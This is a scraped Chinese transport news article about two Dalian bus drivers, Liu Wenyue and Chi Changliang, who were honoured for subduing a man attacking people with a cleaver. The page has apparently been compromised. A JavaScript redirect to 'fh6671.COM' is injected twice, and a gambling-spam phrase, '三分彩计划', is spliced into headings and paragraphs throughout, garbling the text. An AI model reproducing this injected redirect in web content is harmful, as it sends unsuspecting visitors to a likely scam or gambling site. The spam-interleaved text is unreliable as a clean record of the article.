function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

三分彩计划

交通运输部主管  中国交通报社主办

中国交通新闻网三分彩计划  > 要闻

大连公交两司机被授予大连市“见义勇为先进分子”

2020-11-18 16:09:31 来源:中国交通新闻网 作者:大连公交

本网讯 日前,辽宁省大连市见义勇为基金会与瓦房店市公安局来到大连公交客运集团有限公司瓦房店汽车分公司,专程表彰勇斗持刀行凶歹徒的3路公交车驾驶员刘文悦、2路公交车驾驶员迟长亮,并授予刘文悦、迟长亮大连市“见义勇为先进分子”,奖励刘文悦2万元、迟长亮1万元。

三分彩计划function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

事件回放

三分彩计划今年4月14日11时40分许,正在瓦房店火车站前广场待发的3路驾驶员刘文悦发现:广场上的群众突然惊慌四散,一名中年男子手持菜刀正在后面追砍……刘文悦立即拉下公交车手刹,一边大声喝止:“嗨,你干什么!放下菜刀!”一边冲下公交车。男子见有人制止,挥舞着菜刀冲上前来。刘文悦瞅准时机,拚力夺下了菜刀。此时,2路驾驶员迟长亮发现险情后先是拨打了报警电话,随后也冲过来。两人配合下,终将行凶男子制服。随后,刘文悦和迟长亮把男子交给赶来的广场治安协警,配合到站前派出所作了笔录,便又回到工作岗位。

刘文悦

3路驾驶员刘文悦今年45岁。1994年12月至1998年12月在安徽省安庆市当兵四年,1996年在部队入党,1998年参加过抗洪抢险,曾被评为优秀士兵、三次获得嘉奖; 2005年进入瓦房店汽车分公司工作。

三分彩计划对于自己见义勇为的行为,刘文悦说:“我是一名复转军人、共产党员。事发时,我没想别的,也来不及想,完全是本能反应,怕他伤害到别人,就上去先把刀夺了下来!”

迟长亮

三分彩计划2路驾驶员迟长亮今年39岁,是2018年入职瓦房店汽车分公司的。此前,他在瓦房店长途汽车客运站从事驾驶工作。

三分彩计划对于自己见义勇为的举动,迟长亮表示:“当时事发突然,我第一时间报了警。然后冲下车协助刘文悦将歹徒制服,我不能让我的同事和周围群众受到伤害!”

持刀行凶歹徒柳某某,吉林人,47岁,无妻子、子女,在瓦房店市以打零工为生,经常喝酒滋事。当日,柳某某醉酒持刀追砍群众,虽被制止未酿成恶果,但造成社会恐慌,构成寻械滋事罪,因其患病,目前在取保候审中。

对于公交驾驶员见义勇为的行为,警方表示:“事发时站前广场上客流十分密集。歹徒的行为,如果没有得到及时制止,后果不堪设想。他们的行为弘扬了社会正气,体现了社会正能量,值得倡导和学习!”

中国交通新闻网版权及免责声明:
1、凡本网注明“来源:中国交通报”、“来源:中国交通新闻网” 的所有作品,版权均属于中国交通新闻网,未经本网授权,任何单位及个人不得转载、摘编或以其他方式使用上述作品。已经本网授权使用作品的,应在授权范围 内使用,并注明“来源:中国交通新闻网”。违反上述声明者,本网将追究其相关法律责任。
2、凡本网注明 “来源:XXX(非中国交通新闻网)” 的作品,均转载自其他媒体,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。
3、如因作品内容、版权和其他问题需要同本网联系的,请在30日内进行。

新媒体

热门推荐更多>>

问计于民问计于网

围绕党中央、国务院重大决策部署和交通运输部党组中心工作,倾听群众呼声、查找突出问题、吸收基层智慧,更好服务人民、服务大局、服务基层。